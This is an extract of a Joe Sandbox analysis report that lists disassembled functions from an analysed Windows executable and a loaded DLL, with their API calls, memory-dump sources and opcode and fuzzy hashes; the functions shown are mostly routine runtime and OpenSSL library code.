                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2119999506.00007FFE00829000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_7ffe00760000_program.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: ErrorLast
                                                                                                                                                                                                                                              • String ID: ..\s\ssl\record\rec_layer_s3.c$ssl3_write_pending
                                                                                                                                                                                                                                              • API String ID: 1452528299-1219543453
                                                                                                                                                                                                                                              • Opcode ID: 5b41cf49d76ee813241620147cb438b9269980a246317de21737170a9b88665e
                                                                                                                                                                                                                                              • Instruction ID: 6693d6dd0a551a673d6da3c826f9b48a180c43ab5792340b9dad0ff8b7368ceb
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 5b41cf49d76ee813241620147cb438b9269980a246317de21737170a9b88665e
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 0F41A0B2B0AA4182F7A0AB15D5447B973A0FB85B84F1C8136EB4D07BADDF3DE4518341
                                                                                                                                                                                                                                              Function 00007FF6B750CC3C Relevance: 4.6, APIs: 3, Instructions: 94COMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2116056322.00007FF6B7501000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6B7500000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2115877343.00007FF6B7500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2116174353.00007FF6B752B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2116227515.00007FF6B753E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2116227515.00007FF6B7541000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2116412855.00007FF6B7544000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_7ff6b7500000_program.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: __scrt_acquire_startup_lock__scrt_dllmain_crt_thread_attach__scrt_get_show_window_mode__scrt_release_startup_lock
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 3251591375-0
                                                                                                                                                                                                                                              • Opcode ID: b3dd18574e8b698ea28c35ed35ed65a6730a16d6ac14c38d0a8ba428da0d66bc
                                                                                                                                                                                                                                              • Instruction ID: c5f8044358c9d798c5894b463f45aa4f97b247633c3543ef5eb62a9e4030bf9b
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: b3dd18574e8b698ea28c35ed35ed65a6730a16d6ac14c38d0a8ba428da0d66bc
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 77313A23E0C29745FA54AB6C94623F91791AF82388F44503AEB4ECB6F7DE2DB8059241
                                                                                                                                                                                                                                              Function 00007FF6B751013C Relevance: 3.2, APIs: 2, Instructions: 177COMMONLIBRARYCODE
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2116056322.00007FF6B7501000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6B7500000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2115877343.00007FF6B7500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2116174353.00007FF6B752B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2116227515.00007FF6B753E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2116227515.00007FF6B7541000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2116412855.00007FF6B7544000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_7ff6b7500000_program.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 3215553584-0
                                                                                                                                                                                                                                              • Opcode ID: e80cfa20b6c7ebf2f27a6dba6ddb06cb01cda21135ba71ef9e2cf3b7629ca058
                                                                                                                                                                                                                                              • Instruction ID: 9e601518f5a6b0b002dad5668a8733424aa08585c56ca06e0a9f930c2eb9cb6b
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: e80cfa20b6c7ebf2f27a6dba6ddb06cb01cda21135ba71ef9e2cf3b7629ca058
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 6F510723B0D26586FB289F2D980167A6291BF44BA5F194735DF7D83BE5DF3CE4018620
                                                                                                                                                                                                                                              Function 00007FF6B751C134 Relevance: 3.0, APIs: 2, Instructions: 46COMMONLIBRARYCODE
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2116056322.00007FF6B7501000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6B7500000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2115877343.00007FF6B7500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2116174353.00007FF6B752B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2116227515.00007FF6B753E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2116227515.00007FF6B7541000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2116412855.00007FF6B7544000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_7ff6b7500000_program.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: ErrorFileLastPointer
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 2976181284-0
                                                                                                                                                                                                                                              • Opcode ID: 7d52f85de62641260209e8dbb28c5e1251e01e8bf24b4306ce9dcd9badf2c9c6
                                                                                                                                                                                                                                              • Instruction ID: 9348fd7082fa0307d0cc518e5fe57c94b1d6325e0784e436dff23ff2b4a4699b
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 7d52f85de62641260209e8dbb28c5e1251e01e8bf24b4306ce9dcd9badf2c9c6
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 8211C463A0CAA181DA208B2AE8141696361AB45FF4F544335EF7D8BBF9DE7CE0518740
                                                                                                                                                                                                                                              Function 00007FF6B751AB58 Relevance: 2.6, APIs: 2, Instructions: 59COMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • CloseHandle.KERNEL32(?,?,?,00007FF6B751A9D5,?,?,00000000,00007FF6B751AA8A), ref: 00007FF6B751ABC6
                                                                                                                                                                                                                                              • GetLastError.KERNEL32(?,?,?,00007FF6B751A9D5,?,?,00000000,00007FF6B751AA8A), ref: 00007FF6B751ABD0
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2116056322.00007FF6B7501000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6B7500000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2115877343.00007FF6B7500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2116174353.00007FF6B752B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2116227515.00007FF6B753E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2116227515.00007FF6B7541000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2116412855.00007FF6B7544000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_7ff6b7500000_program.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: CloseErrorHandleLast
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 918212764-0
                                                                                                                                                                                                                                              • Opcode ID: ae1e15d82824e1a5fac1c7302ca2ff5641fe0b0e43db7728cd9339717749910c
                                                                                                                                                                                                                                              • Instruction ID: 407f86b3c7839f6f1954c1288e880ec10a226cb763a7050fad2a332fc2f14047
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: ae1e15d82824e1a5fac1c7302ca2ff5641fe0b0e43db7728cd9339717749910c
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 7421AB13F1C6E241FA669BA9949037D12929F847A5F044239DB1EC7FF5DE6CF8814300
                                                                                                                                                                                                                                              Function 00007FF6B751BEAC Relevance: 1.6, APIs: 1, Instructions: 112COMMONLIBRARYCODE
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2116056322.00007FF6B7501000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6B7500000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2115877343.00007FF6B7500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2116174353.00007FF6B752B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2116227515.00007FF6B753E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2116227515.00007FF6B7541000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2116412855.00007FF6B7544000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_7ff6b7500000_program.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 3215553584-0
                                                                                                                                                                                                                                              • Opcode ID: 5a303e376ae32d58fd1e52f1ac99a64fdc1cf63549abbe0bdd4da132c2ec767e
                                                                                                                                                                                                                                              • Instruction ID: 6c5d8e89f1f6e1cb93ead1f22dc2cae22c4fa37c2040123e0360d7510bde1ba4
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 5a303e376ae32d58fd1e52f1ac99a64fdc1cf63549abbe0bdd4da132c2ec767e
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 9C419A3391C25587EA259F2DA54027973A1EB5AB92F100235EBCEC3AE1CF6CE4438B51
                                                                                                                                                                                                                                              Function 00007FF6B7507F90 Relevance: 1.6, APIs: 1, Instructions: 85COMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2116056322.00007FF6B7501000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6B7500000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2115877343.00007FF6B7500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2116174353.00007FF6B752B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2116227515.00007FF6B753E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2116227515.00007FF6B7541000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2116412855.00007FF6B7544000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_7ff6b7500000_program.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: _fread_nolock
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 840049012-0
                                                                                                                                                                                                                                              • Opcode ID: 479405c7ef634ee4bdd4ed85459738d9743f05c8c4b8da07aaad499d404441fa
                                                                                                                                                                                                                                              • Instruction ID: 37860710e2ad52b969d1663f6b44e6b6ee08945183f3051cc32d536a3ba7d339
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 479405c7ef634ee4bdd4ed85459738d9743f05c8c4b8da07aaad499d404441fa
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 2421D622B1C66146FA109B2A6914BFA9781BF45BD8F884430EF4C97B96CE7DF042C300
                                                                                                                                                                                                                                              Function 00007FF6B751B93C Relevance: 1.6, APIs: 1, Instructions: 79COMMONLIBRARYCODE
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2116056322.00007FF6B7501000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6B7500000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2115877343.00007FF6B7500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2116174353.00007FF6B752B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2116227515.00007FF6B753E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2116227515.00007FF6B7541000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2116412855.00007FF6B7544000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_7ff6b7500000_program.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 3215553584-0
                                                                                                                                                                                                                                              • Opcode ID: c2d01373d3233558d420055387ebca2c39d1ce99b2c1a08127fa32cb0ba5fec2
                                                                                                                                                                                                                                              • Instruction ID: 1e28fe687b4b102906b4916518218b98f1f38c22012c395fdba5b578c0066d66
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: c2d01373d3233558d420055387ebca2c39d1ce99b2c1a08127fa32cb0ba5fec2
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: BF316123A1C62285F7116F5D884137C26A0AF80FA6F415235EB5D97BF2CE7CF4428711
                                                                                                                                                                                                                                              Function 00007FF6B7515F94 Relevance: 1.6, APIs: 1, Instructions: 55COMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2116056322.00007FF6B7501000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6B7500000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2115877343.00007FF6B7500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2116174353.00007FF6B752B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2116227515.00007FF6B753E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2116227515.00007FF6B7541000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2116412855.00007FF6B7544000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_7ff6b7500000_program.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 3215553584-0
                                                                                                                                                                                                                                              • Opcode ID: d0ecc1d4814c8292f6d285d86e9f4332b8d7141ecd04c52723bb65a1ba9d936a
                                                                                                                                                                                                                                              • Instruction ID: 1ed75aa72f50d236d9686b0a6e597cd7aba8c1c411a2243c41135f4c077dd308
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: d0ecc1d4814c8292f6d285d86e9f4332b8d7141ecd04c52723bb65a1ba9d936a
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: C5116023E1C66282EA61AF19940027EA264BF85B85F444536FB8CD7FB6DF3DE4418700
                                                                                                                                                                                                                                              Function 00007FF6B7526354 Relevance: 1.6, APIs: 1, Instructions: 54COMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2116056322.00007FF6B7501000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6B7500000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2115877343.00007FF6B7500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2116174353.00007FF6B752B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2116227515.00007FF6B753E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2116227515.00007FF6B7541000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2116412855.00007FF6B7544000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_7ff6b7500000_program.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 3215553584-0
                                                                                                                                                                                                                                              • Opcode ID: 3765a10cee1e255344ee37f065f4be71d58868c9c9e645b3056c9746d3493235
                                                                                                                                                                                                                                              • Instruction ID: be48282a8cd2cc7da7c5f69b13c750ed32804945e68f4a7ac804d1c504c0b065
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 3765a10cee1e255344ee37f065f4be71d58868c9c9e645b3056c9746d3493235
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: F3218433A1CA4586EB618F1CD48037976A0FB94B54F244234EB9EC7AE9DF3CD4118B00
                                                                                                                                                                                                                                              Function 00007FFE007BF070 Relevance: 1.6, APIs: 1, Instructions: 303COMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2119745990.00007FFE00761000.00000040.00000001.01000000.00000010.sdmp, Offset: 00007FFE00760000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2119715206.00007FFE00760000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2119745990.00007FFE007E3000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2119745990.00007FFE007E5000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2119745990.00007FFE0080D000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2119745990.00007FFE00818000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2119745990.00007FFE00823000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2119967268.00007FFE00827000.00000080.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2119999506.00007FFE00829000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_7ffe00760000_program.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: ErrorLast
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 1452528299-0
                                                                                                                                                                                                                                              • Opcode ID: 8603938ac5e1fbf28ba7d9b8f40a04eb8b77d7e104ff7c3c46d49aacb8bdd123
                                                                                                                                                                                                                                              • Instruction ID: 6ef378361b40011260eda6503fe923329641f169ad23eeca6a372cdf930790fb
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 8603938ac5e1fbf28ba7d9b8f40a04eb8b77d7e104ff7c3c46d49aacb8bdd123
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 46219F32A0A7828AEB64BA25EC413BD22A0FF00F84F2C4435DB49423A9DE3CE841C651
                                                                                                                                                                                                                                              Function 00007FF6B75103BC Relevance: 1.5, APIs: 1, Instructions: 48COMMONLIBRARYCODE
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2116056322.00007FF6B7501000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6B7500000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2115877343.00007FF6B7500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2116174353.00007FF6B752B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2116227515.00007FF6B753E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2116227515.00007FF6B7541000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2116412855.00007FF6B7544000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_7ff6b7500000_program.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 3215553584-0
                                                                                                                                                                                                                                              • Opcode ID: 8e9754deeba93abb4745aa2efb451e77357aefa8fb0fbddb16feb6c8c90fdd62
                                                                                                                                                                                                                                              • Instruction ID: a84ba4a718ccd5eed1345ccf01100c65a9825216815a7ae7e20535eea5ef0b15
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 8e9754deeba93abb4745aa2efb451e77357aefa8fb0fbddb16feb6c8c90fdd62
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: D901C422E0C76580EA04DF5A99410B9A691BF85FE1F484631EF5C97FE6CE7CE4028300
                                                                                                                                                                                                                                              Function 00007FF6B7508E80 Relevance: 1.5, APIs: 1, Instructions: 19libraryCOMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                • Part of subcall function 00007FF6B7509390: MultiByteToWideChar.KERNEL32(?,?,?,00007FF6B75045F4,00000000,00007FF6B7501985), ref: 00007FF6B75093C9
                                                                                                                                                                                                                                              • LoadLibraryExW.KERNEL32(?,00007FF6B7506476,?,00007FF6B750336E), ref: 00007FF6B7508EA2
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2116056322.00007FF6B7501000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6B7500000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2115877343.00007FF6B7500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2116174353.00007FF6B752B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2116227515.00007FF6B753E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2116227515.00007FF6B7541000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2116412855.00007FF6B7544000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_7ff6b7500000_program.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: ByteCharLibraryLoadMultiWide
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 2592636585-0
                                                                                                                                                                                                                                              • Opcode ID: 3eee33850ff877a76f59ec51b6af72cd7d073a691558276a485592abc3036afa
                                                                                                                                                                                                                                              • Instruction ID: d9a9c119947db750693d65ccc3b578e8df6d0c7b37b8cdcce64977254a4f18bc
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 3eee33850ff877a76f59ec51b6af72cd7d073a691558276a485592abc3036afa
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 3CD0C202F3825642EA48A76BBA46A795251AF89BC0F88D035EF4D43B6AEC3CD0414B00
                                                                                                                                                                                                                                              Function 00007FFE0076EF30 Relevance: 1.3, APIs: 1, Instructions: 60COMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2119745990.00007FFE00761000.00000040.00000001.01000000.00000010.sdmp, Offset: 00007FFE00760000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2119715206.00007FFE00760000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2119745990.00007FFE007E3000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2119745990.00007FFE007E5000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2119745990.00007FFE0080D000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2119745990.00007FFE00818000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2119745990.00007FFE00823000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2119967268.00007FFE00827000.00000080.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2119999506.00007FFE00829000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_7ffe00760000_program.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: ErrorLast
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 1452528299-0
                                                                                                                                                                                                                                              • Opcode ID: 508d3c56008b8407d9579c500c6569aa09f18e491ddf20235239c49dae927103
                                                                                                                                                                                                                                              • Instruction ID: 2c4080e693f30776634ba9d2c2f66456547a75d61390a7110f310b8cb6a3c1ec
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 508d3c56008b8407d9579c500c6569aa09f18e491ddf20235239c49dae927103
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 0F217132B08B8187E7549B26A5446AEB2A5FB88B94F584135EB8D43FA9CF3CD451CB04
                                                                                                                                                                                                                                              Function 00007FFE00761DF7 Relevance: 1.3, APIs: 1, Instructions: 59COMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2119745990.00007FFE00761000.00000040.00000001.01000000.00000010.sdmp, Offset: 00007FFE00760000, based on PE: true
